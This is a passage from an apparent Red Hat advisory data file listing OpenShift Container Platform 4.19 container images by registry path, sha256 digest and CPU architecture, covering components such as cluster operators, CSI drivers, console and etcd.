"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
